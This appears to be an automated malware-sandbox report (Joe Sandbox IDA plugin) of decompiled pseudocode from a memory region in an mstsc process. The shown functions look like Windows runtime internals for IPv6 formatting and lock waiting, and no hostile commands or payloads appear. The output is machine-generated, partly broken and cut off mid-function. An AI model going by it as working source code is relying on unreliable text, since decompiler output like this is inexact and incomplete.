                                              			E026014C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                              				signed int _v8;
                                              				char _v10;
                                              				char _v140;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t24;
                                              				void* _t26;
                                              				signed int _t29;
                                              				signed int _t34;
                                              				signed int _t40;
                                              				intOrPtr _t45;
                                              				void* _t51;
                                              				intOrPtr* _t52;
                                              				void* _t54;
                                              				signed int _t57;
                                              				void* _t58;
                                              
                                              				_t51 = __edx;
                                              				_t24 =  *0x26a2088; // 0x7614a8e1
                                              				_v8 = _t24 ^ _t57;
                                              				_t45 = _a16;
                                              				_t53 = _a4;
                                              				_t52 = _a20;
                                              				if(_a4 == 0 || _t52 == 0) {
                                              					L10:
                                              					_t26 = 0xc000000d;
                                              				} else {
                                              					if(_t45 == 0) {
                                              						if( *_t52 == _t45) {
                                              							goto L3;
                                              						} else {
                                              							goto L10;
                                              						}
                                              					} else {
                                              						L3:
                                              						_t28 =  &_v140;
                                              						if(_a12 != 0) {
                                              							_push("[");
                                              							_push(0x41);
                                              							_push( &_v140);
                                              							_t29 = E025F7707();
                                              							_t58 = _t58 + 0xc;
                                              							_t28 = _t57 + _t29 * 2 - 0x88;
                                              						}
                                              						_t54 = E026013CB(_t53, _t28);
                                              						if(_a8 != 0) {
                                              							_t34 = E025F7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                              							_t58 = _t58 + 0x10;
                                              							_t54 = _t54 + _t34 * 2;
                                              						}
                                              						if(_a12 != 0) {
                                              							_t40 = E025F7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                              							_t58 = _t58 + 0x10;
                                              							_t54 = _t54 + _t40 * 2;
                                              						}
                                              						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                              						 *_t52 = _t53;
                                              						if( *_t52 < _t53) {
                                              							goto L10;
                                              						} else {
                                              							E025C2340(_t45,  &_v140, _t53 + _t53);
                                              							_t26 = 0;
                                              						}
                                              					}
                                              				}
                                              				return E025CE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                              			}




















                                              0x026014c0
                                              0x026014cb
                                              0x026014d2
                                              0x026014d6
                                              0x026014da
                                              0x026014de
                                              0x026014e3
                                              0x0260157a
                                              0x0260157a
                                              0x026014f1
                                              0x026014f3
                                              0x0262ea0f
                                              0x00000000
                                              0x0262ea15
                                              0x00000000
                                              0x0262ea15
                                              0x026014f9
                                              0x026014f9
                                              0x026014fe
                                              0x02601504
                                              0x0262ea1a
                                              0x0262ea1f
                                              0x0262ea21
                                              0x0262ea22
                                              0x0262ea27
                                              0x0262ea2a
                                              0x0262ea2a
                                              0x02601515
                                              0x02601517
                                              0x0260156d
                                              0x02601572
                                              0x02601575
                                              0x02601575
                                              0x0260151e
                                              0x0262ea50
                                              0x0262ea55
                                              0x0262ea58
                                              0x0262ea58
                                              0x0260152e
                                              0x02601531
                                              0x02601533
                                              0x00000000
                                              0x02601535
                                              0x02601541
                                              0x02601549
                                              0x02601549
                                              0x02601533
                                              0x026014f3
                                              0x02601559

                                              APIs
                                              • ___swprintf_l.LIBCMT ref: 0262EA22
                                                • Part of subcall function 026013CB: ___swprintf_l.LIBCMT ref: 0260146B
                                                • Part of subcall function 026013CB: ___swprintf_l.LIBCMT ref: 02601490
                                              • ___swprintf_l.LIBCMT ref: 0260156D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: 38fede205ed9464856a084cc838c998ae4187211f5382ae6fe44a04f6c71aba4
                                              • Instruction ID: a7b0e7c4039191e366b9a6ef0955c4985560ffc78be263083c1d25413f6354fa
                                              • Opcode Fuzzy Hash: 38fede205ed9464856a084cc838c998ae4187211f5382ae6fe44a04f6c71aba4
                                              • Instruction Fuzzy Hash: 0F21F9B29002199FDB25DE54CC40AEF73BCBB55704F444456EC4AD7240EB70EA598FD0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 44%
                                              			E025E53A5(signed int _a4, char _a8) {
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t32;
                                              				signed int _t37;
                                              				signed int _t40;
                                              				signed int _t42;
                                              				void* _t45;
                                              				intOrPtr _t46;
                                              				signed int _t49;
                                              				void* _t51;
                                              				signed int _t57;
                                              				signed int _t64;
                                              				signed int _t71;
                                              				void* _t74;
                                              				intOrPtr _t78;
                                              				signed int* _t79;
                                              				void* _t85;
                                              				signed int _t86;
                                              				signed int _t92;
                                              				void* _t104;
                                              				void* _t105;
                                              
                                              				_t64 = _a4;
                                              				_t32 =  *(_t64 + 0x28);
                                              				_t71 = _t64 + 0x28;
                                              				_push(_t92);
                                              				if(_t32 < 0) {
                                              					_t78 =  *[fs:0x18];
                                              					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                              					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                              						goto L3;
                                              					} else {
                                              						__eflags = _t32 | 0xffffffff;
                                              						asm("lock xadd [ecx], eax");
                                              						return 1;
                                              					}
                                              				} else {
                                              					L3:
                                              					_push(_t86);
                                              					while(1) {
                                              						L4:
                                              						__eflags = _t32;
                                              						if(_t32 == 0) {
                                              							break;
                                              						}
                                              						__eflags = _a8;
                                              						if(_a8 == 0) {
                                              							__eflags = 0;
                                              							return 0;
                                              						} else {
                                              							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                              							_t79 = _t64 + 0x24;
                                              							_t71 = 1;
                                              							asm("lock xadd [eax], ecx");
                                              							_t32 =  *(_t64 + 0x28);
                                              							_a4 = _t32;
                                              							__eflags = _t32;
                                              							if(_t32 != 0) {
                                              								L19:
                                              								_t86 = 0;
                                              								__eflags = 0;
                                              								while(1) {
                                              									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                              									asm("sbb esi, esi");
                                              									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026a01c0;
                                              									_push(_t92);
                                              									_push(0);
                                              									_t37 = E025BF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                              									__eflags = _t37 - 0x102;
                                              									if(_t37 != 0x102) {
                                              										break;
                                              									}
                                              									_t71 =  *(_t92 + 4);
                                              									_t85 =  *_t92;
                                              									_t51 = E02604FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                              									_push(_t85);
                                              									_push(_t51);
                                              									E02613F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                              									E02613F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                              									_t86 = _t86 + 1;
                                              									_t105 = _t104 + 0x28;
                                              									__eflags = _t86 - 2;
                                              									if(__eflags > 0) {
                                              										E0264217A(_t71, __eflags, _t64);
                                              									}
                                              									_push("RTL: Re-Waiting\n");
                                              									_push(0);
                                              									_push(0x65);
                                              									E02613F92();
                                              									_t104 = _t105 + 0xc;
                                              								}
                                              								__eflags = _t37;
                                              								if(__eflags < 0) {
                                              									_push(_t37);
                                              									E02603915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                              									asm("int3");
                                              									_t40 =  *_t71;
                                              									 *_t71 = 0;
                                              									__eflags = _t40;
                                              									if(_t40 == 0) {
                                              										L1:
                                              										_t42 = E025E5384(_t92 + 0x24);
                                              										if(_t42 != 0) {
                                              											goto L31;
                                              										} else {
                                              											goto L2;
                                              										}
                                              									} else {
                                              										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                              										_push( &_a4);
                                              										_push(_t40);
                                              										_t49 = E025BF970( *((intOrPtr*)(_t92 + 0x18)));
                                              										__eflags = _t49;
                                              										if(__eflags >= 0) {
                                              											goto L1;
                                              										} else {
                                              											_push(_t49);
                                              											E02603915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                              											L31:
                                              											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                              											_push( &_a4);
                                              											_push(1);
                                              											_t42 = E025BF970( *((intOrPtr*)(_t92 + 0x20)));
                                              											__eflags = _t42;
                                              											if(__eflags >= 0) {
                                              												L2:
                                              												return _t42;
                                              											} else {
                                              												_push(_t42);
                                              												E02603915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                              												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                              												_push( &_a4);
                                              												_push(1);
                                              												_t42 = E025BF970( *((intOrPtr*)(_t92 + 0x20)));
                                              												__eflags = _t42;
                                              												if(__eflags >= 0) {
                                              													goto L2;
                                              												} else {
                                              													_push(_t42);
                                              													_t45 = E02603915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                              													asm("int3");
                                              													while(1) {
                                              														_t74 = _t45;
                                              														__eflags = _t45 - 1;
                                              														if(_t45 != 1) {
                                              															break;
                                              														}
                                              														_t86 = _t86 | 0xffffffff;
                                              														_t45 = _t74;
                                              														asm("lock cmpxchg [ebx], edi");
                                              														__eflags = _t45 - _t74;
                                              														if(_t45 != _t74) {
                                              															continue;
                                              														} else {
                                              															_t46 =  *[fs:0x18];
                                              															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                              															return _t46;
                                              														}
                                              														goto L37;
                                              													}
                                              													E025E5329(_t74, _t92);
                                              													_push(1);
                                              													return E025E53A5(_t92);
                                              												}
                                              											}
                                              										}
                                              									}
                                              								} else {
                                              									_t32 =  *(_t64 + 0x28);
                                              									continue;
                                              								}
                                              							} else {
                                              								_t71 =  *_t79;
                                              								__eflags = _t71;
                                              								if(__eflags > 0) {
                                              									while(1) {
                                              										_t57 = _t71;
                                              										asm("lock cmpxchg [edi], esi");
                                              										__eflags = _t57 - _t71;
                                              										if(_t57 == _t71) {
                                              											break;
                                              										}
                                              										_t71 = _t57;
                                              										__eflags = _t57;
                                              										if(_t57 > 0) {
                                              											continue;
                                              										}
                                              										break;
                                              									}
                                              									_t32 = _a4;
                                              									__eflags = _t71;
                                              								}
                                              								if(__eflags != 0) {
                                              									continue;
                                              								} else {
                                              									goto L19;
                                              								}
                                              							}
                                              						}
                                              						goto L37;
                                              					}
                                              					_t71 = _t71 | 0xffffffff;
                                              					_t32 = 0;
                                              					asm("lock cmpxchg [edx], ecx");
                                              					__eflags = 0;
                                              					if(0 != 0) {
                                              						goto L4;
                                              					} else {
                                              						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                              						return 1;
                                              					}
                                              				}
                                              				L37:
                                              			}

























                                              0x025e53ab
                                              0x025e53ae
                                              0x025e53b1
                                              0x025e53b4
                                              0x025e53b7
                                              0x026005b6
                                              0x026005c0
                                              0x026005c3
                                              0x00000000
                                              0x026005c9
                                              0x026005c9
                                              0x026005cc
                                              0x026005d5
                                              0x026005d5
                                              0x025e53bd
                                              0x025e53bd
                                              0x025e53bd
                                              0x025e53be
                                              0x025e53be
                                              0x025e53be
                                              0x025e53c0
                                              0x00000000
                                              0x00000000
                                              0x02622269
                                              0x0262226d
                                              0x02622349
                                              0x0262234d
                                              0x02622273
                                              0x02622276
                                              0x02622279
                                              0x0262227e
                                              0x02622283
                                              0x02622287
                                              0x0262228a
                                              0x0262228d
                                              0x0262228f
                                              0x026222bc
                                              0x026222bc
                                              0x026222bc
                                              0x026222be
                                              0x026222c4
                                              0x026222cc
                                              0x026222d0
                                              0x026222d6
                                              0x026222d7
                                              0x026222da
                                              0x026222df
                                              0x026222e4
                                              0x00000000
                                              0x00000000
                                              0x026222e6
                                              0x026222e9
                                              0x026222f4
                                              0x026222f9
                                              0x026222fa
                                              0x02622305
                                              0x02622314
                                              0x02622319
                                              0x0262231a
                                              0x0262231d
                                              0x02622320
                                              0x02622323
                                              0x02622323
                                              0x02622328
                                              0x0262232d
                                              0x0262232f
                                              0x02622331
                                              0x02622336
                                              0x02622336
                                              0x0262233b
                                              0x0262233d
                                              0x02622350
                                              0x02622351
                                              0x02622356
                                              0x02622359
                                              0x02622359
                                              0x0262235b
                                              0x0262235d
                                              0x025e5367
                                              0x025e536b
                                              0x025e5372
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02622363
                                              0x02622363
                                              0x02622369
                                              0x0262236a
                                              0x0262236c
                                              0x02622371
                                              0x02622373
                                              0x00000000
                                              0x02622379
                                              0x02622379
                                              0x0262237a
                                              0x0262237f
                                              0x0262237f
                                              0x02622385
                                              0x02622386
                                              0x02622389
                                              0x0262238e
                                              0x02622390
                                              0x025e5378
                                              0x025e537c
                                              0x02622396
                                              0x02622396
                                              0x02622397
                                              0x0262239c
                                              0x026223a2
                                              0x026223a3
                                              0x026223a6
                                              0x026223ab
                                              0x026223ad
                                              0x00000000
                                              0x026223b3
                                              0x026223b3
                                              0x026223b4
                                              0x026223b9
                                              0x026223ba
                                              0x026223ba
                                              0x026223bc
                                              0x026223bf
                                              0x00000000
                                              0x00000000
                                              0x02619153
                                              0x02619158
                                              0x0261915a
                                              0x0261915e
                                              0x02619160
                                              0x00000000
                                              0x02619166
                                              0x02619166
                                              0x02619171
                                              0x02619176
                                              0x02619176
                                              0x00000000
                                              0x02619160
                                              0x026223c6
                                              0x026223cb
                                              0x026223d7
                                              0x026223d7
                                              0x026223ad
                                              0x02622390
                                              0x02622373
                                              0x0262233f
                                              0x0262233f
                                              0x00000000
                                              0x0262233f
                                              0x02622291
                                              0x02622291
                                              0x02622293
                                              0x02622295
                                              0x0262229a
                                              0x026222a1
                                              0x026222a3
                                              0x026222a7
                                              0x026222a9
                                              0x00000000
                                              0x00000000
                                              0x026222ab
                                              0x026222ad
                                              0x026222af
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x026222af
                                              0x026222b1
                                              0x026222b4
                                              0x026222b4
                                              0x026222b6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x026222b6
                                              0x0262228f
                                              0x00000000
                                              0x0262226d
                                              0x025e53cb
                                              0x025e53ce
                                              0x025e53d0
                                              0x025e53d4
                                              0x025e53d6
                                              0x00000000
                                              0x025e53d8
                                              0x025e53e3
                                              0x025e53ea
                                              0x025e53ea
                                              0x025e53d6
                                              0x00000000

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026222F4
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 02622328
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 026222FC
                                              • RTL: Resource at %p, xrefs: 0262230B
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-871070163
                                              • Opcode ID: e252a658c40b71fe46a416bd779664e76739b005401af460dc5259f91f508b3a
                                              • Instruction ID: 129c1ff3322046ed91368141e33a65a04566d1f649e2e7daef696ab941fb45de
                                              • Opcode Fuzzy Hash: e252a658c40b71fe46a416bd779664e76739b005401af460dc5259f91f508b3a
                                              • Instruction Fuzzy Hash: BB51F6716016166BEF199F28CC90FA773AABF88324F114219FD05DB280FB61E8458F98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 51%
                                              			E025EEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				signed int _v24;
                                              				intOrPtr* _v28;
                                              				intOrPtr _v32;
                                              				signed int _v36;
                                              				intOrPtr _v40;
                                              				short _v66;
                                              				char _v72;
                                              				void* __esi;
                                              				intOrPtr _t38;
                                              				intOrPtr _t39;
                                              				signed int _t40;
                                              				intOrPtr _t42;
                                              				intOrPtr _t43;
                                              				signed int _t44;
                                              				void* _t46;
                                              				intOrPtr _t48;
                                              				signed int _t49;
                                              				intOrPtr _t50;
                                              				intOrPtr _t53;
                                              				signed char _t67;
                                              				void* _t72;
                                              				intOrPtr _t77;
                                              				intOrPtr* _t80;
                                              				intOrPtr _t84;
                                              				intOrPtr* _t85;
                                              				void* _t91;
                                              				void* _t92;
                                              				void* _t93;
                                              
                                              				_t80 = __edi;
                                              				_t75 = __edx;
                                              				_t70 = __ecx;
                                              				_t84 = _a4;
                                              				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                              					E025DDA92(__ecx, __edx, __eflags, _t84);
                                              					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                              				}
                                              				_push(0);
                                              				__eflags = _t38 - 0xffffffff;
                                              				if(_t38 == 0xffffffff) {
                                              					_t39 =  *0x26a793c; // 0x0
                                              					_push(0);
                                              					_push(_t84);
                                              					_t40 = E025C16C0(_t39);
                                              				} else {
                                              					_t40 = E025BF9D4(_t38);
                                              				}
                                              				_pop(_t85);
                                              				__eflags = _t40;
                                              				if(__eflags < 0) {
                                              					_push(_t40);
                                              					E02603915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                              					asm("int3");
                                              					while(1) {
                                              						L21:
                                              						_t76 =  *[fs:0x18];
                                              						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                              						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                              						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                              							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                              							_v66 = 0x1722;
                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                              							_t76 =  &_v72;
                                              							_push( &_v72);
                                              							_v28 = _t85;
                                              							_v40 =  *((intOrPtr*)(_t85 + 4));
                                              							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                              							_push(0x10);
                                              							_push(0x20402);
                                              							E025C01A4( *0x7ffe0382 & 0x000000ff);
                                              						}
                                              						while(1) {
                                              							_t43 = _v8;
                                              							_push(_t80);
                                              							_push(0);
                                              							__eflags = _t43 - 0xffffffff;
                                              							if(_t43 == 0xffffffff) {
                                              								_t71 =  *0x26a793c; // 0x0
                                              								_push(_t85);
                                              								_t44 = E025C1F28(_t71);
                                              							} else {
                                              								_t44 = E025BF8CC(_t43);
                                              							}
                                              							__eflags = _t44 - 0x102;
                                              							if(_t44 != 0x102) {
                                              								__eflags = _t44;
                                              								if(__eflags < 0) {
                                              									_push(_t44);
                                              									E02603915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                              									asm("int3");
                                              									E02642306(_t85);
                                              									__eflags = _t67 & 0x00000002;
                                              									if((_t67 & 0x00000002) != 0) {
                                              										_t7 = _t67 + 2; // 0x4
                                              										_t72 = _t7;
                                              										asm("lock cmpxchg [edi], ecx");
                                              										__eflags = _t67 - _t67;
                                              										if(_t67 == _t67) {
                                              											E025EEC56(_t72, _t76, _t80, _t85);
                                              										}
                                              									}
                                              									return 0;
                                              								} else {
                                              									__eflags = _v24;
                                              									if(_v24 != 0) {
                                              										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                              									}
                                              									return 2;
                                              								}
                                              								goto L36;
                                              							}
                                              							_t77 =  *((intOrPtr*)(_t80 + 4));
                                              							_push(_t67);
                                              							_t46 = E02604FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                              							_push(_t77);
                                              							E02613F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                              							_t48 =  *_t85;
                                              							_t92 = _t91 + 0x18;
                                              							__eflags = _t48 - 0xffffffff;
                                              							if(_t48 == 0xffffffff) {
                                              								_t49 = 0;
                                              								__eflags = 0;
                                              							} else {
                                              								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                              							}
                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                              							_push(_t49);
                                              							_t50 = _v12;
                                              							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                              							_push(_t85);
                                              							_push( *((intOrPtr*)(_t85 + 0xc)));
                                              							_push( *((intOrPtr*)(_t50 + 0x24)));
                                              							E02613F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                              							_t53 =  *_t85;
                                              							_t93 = _t92 + 0x20;
                                              							_t67 = _t67 + 1;
                                              							__eflags = _t53 - 0xffffffff;
                                              							if(_t53 != 0xffffffff) {
                                              								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                              								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                              							}
                                              							__eflags = _t67 - 2;
                                              							if(_t67 > 2) {
                                              								__eflags = _t85 - 0x26a20c0;
                                              								if(_t85 != 0x26a20c0) {
                                              									_t76 = _a4;
                                              									__eflags = _a4 - _a8;
                                              									if(__eflags == 0) {
                                              										E0264217A(_t71, __eflags, _t85);
                                              									}
                                              								}
                                              							}
                                              							_push("RTL: Re-Waiting\n");
                                              							_push(0);
                                              							_push(0x65);
                                              							_a8 = _a4;
                                              							E02613F92();
                                              							_t91 = _t93 + 0xc;
                                              							__eflags =  *0x7ffe0382;
                                              							if( *0x7ffe0382 != 0) {
                                              								goto L21;
                                              							}
                                              						}
                                              						goto L36;
                                              					}
                                              				} else {
                                              					return _t40;
                                              				}
                                              				L36:
                                              			}

































                                              0x025eec56
                                              0x025eec56
                                              0x025eec56
                                              0x025eec5c
                                              0x025eec64
                                              0x026223e6
                                              0x026223eb
                                              0x026223eb
                                              0x025eec6a
                                              0x025eec6c
                                              0x025eec6f
                                              0x026223f3
                                              0x026223f8
                                              0x026223fa
                                              0x026223fc
                                              0x025eec75
                                              0x025eec76
                                              0x025eec76
                                              0x025eec7b
                                              0x025eec7c
                                              0x025eec7e
                                              0x02622406
                                              0x02622407
                                              0x0262240c
                                              0x0262240d
                                              0x0262240d
                                              0x0262240d
                                              0x02622414
                                              0x02622417
                                              0x0262241e
                                              0x02622435
                                              0x02622438
                                              0x0262243c
                                              0x0262243f
                                              0x02622442
                                              0x02622443
                                              0x02622446
                                              0x02622449
                                              0x02622453
                                              0x02622455
                                              0x0262245b
                                              0x0262245b
                                              0x025eeb99
                                              0x025eeb99
                                              0x025eeb9c
                                              0x025eeb9d
                                              0x025eeb9f
                                              0x025eeba2
                                              0x02622465
                                              0x0262246b
                                              0x0262246d
                                              0x025eeba8
                                              0x025eeba9
                                              0x025eeba9
                                              0x025eebae
                                              0x025eebb3
                                              0x025eebb9
                                              0x025eebbb
                                              0x02622513
                                              0x02622514
                                              0x02622519
                                              0x0262251b
                                              0x025eec2a
                                              0x025eec2d
                                              0x025eec33
                                              0x025eec36
                                              0x025eec3a
                                              0x025eec3e
                                              0x025eec40
                                              0x025eec47
                                              0x025eec47
                                              0x025eec40
                                              0x025c22c6
                                              0x025eebc1
                                              0x025eebc1
                                              0x025eebc5
                                              0x025eec9a
                                              0x025eec9a
                                              0x025eebd6
                                              0x025eebd6
                                              0x00000000
                                              0x025eebbb
                                              0x02622477
                                              0x0262247c
                                              0x02622486
                                              0x0262248b
                                              0x02622496
                                              0x0262249b
                                              0x0262249d
                                              0x026224a0
                                              0x026224a3
                                              0x026224aa
                                              0x026224aa
                                              0x026224a5
                                              0x026224a5
                                              0x026224a5
                                              0x026224ac
                                              0x026224af
                                              0x026224b0
                                              0x026224b3
                                              0x026224b9
                                              0x026224ba
                                              0x026224bb
                                              0x026224c6
                                              0x026224cb
                                              0x026224cd
                                              0x026224d0
                                              0x026224d1
                                              0x026224d4
                                              0x026224d6
                                              0x026224d9
                                              0x026224d9
                                              0x026224dc
                                              0x026224df
                                              0x026224e1
                                              0x026224e7
                                              0x026224e9
                                              0x026224ec
                                              0x026224ef
                                              0x026224f2
                                              0x026224f2
                                              0x026224ef
                                              0x026224e7
                                              0x026224fa
                                              0x026224ff
                                              0x02622501
                                              0x02622503
                                              0x02622506
                                              0x0262250b
                                              0x025eeb8c
                                              0x025eeb93
                                              0x00000000
                                              0x00000000
                                              0x025eeb93
                                              0x00000000
                                              0x025eeb99
                                              0x025eec85
                                              0x025eec85
                                              0x025eec85
                                              0x00000000

                                              Strings
                                              • RTL: Re-Waiting, xrefs: 026224FA
                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 026224BD
                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0262248D
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                              • API String ID: 0-3177188983
                                              • Opcode ID: cc93332e918b2783693b56a52fbd691adfc53cfb08d5adb96879c38e1eb58626
                                              • Instruction ID: b8b26570d64b1d659d1dbdcd9a8726ac7c5fc01ad684bc6eeac0a2c329e95095
                                              • Opcode Fuzzy Hash: cc93332e918b2783693b56a52fbd691adfc53cfb08d5adb96879c38e1eb58626
                                              • Instruction Fuzzy Hash: 6241C670600614AFDB24DF64CC95FAA77A9BF84720F208A09F9599B3C0D734E951CF69
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E025FFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _t105;
                                              				void* _t110;
                                              				char _t114;
                                              				short _t115;
                                              				void* _t118;
                                              				signed short* _t119;
                                              				short _t120;
                                              				char _t122;
                                              				void* _t127;
                                              				void* _t130;
                                              				signed int _t136;
                                              				intOrPtr _t143;
                                              				signed int _t158;
                                              				signed short* _t164;
                                              				signed int _t167;
                                              				void* _t170;
                                              
                                              				_t158 = 0;
                                              				_t164 = _a4;
                                              				_v20 = 0;
                                              				_v24 = 0;
                                              				_v8 = 0;
                                              				_v12 = 0;
                                              				_v16 = 0;
                                              				_v28 = 0;
                                              				_t136 = 0;
                                              				while(1) {
                                              					_t167 =  *_t164 & 0x0000ffff;
                                              					if(_t167 == _t158) {
                                              						break;
                                              					}
                                              					_t118 = _v20 - _t158;
                                              					if(_t118 == 0) {
                                              						if(_t167 == 0x3a) {
                                              							if(_v12 > _t158 || _v8 > _t158) {
                                              								break;
                                              							} else {
                                              								_t119 =  &(_t164[1]);
                                              								if( *_t119 != _t167) {
                                              									break;
                                              								}
                                              								_t143 = 2;
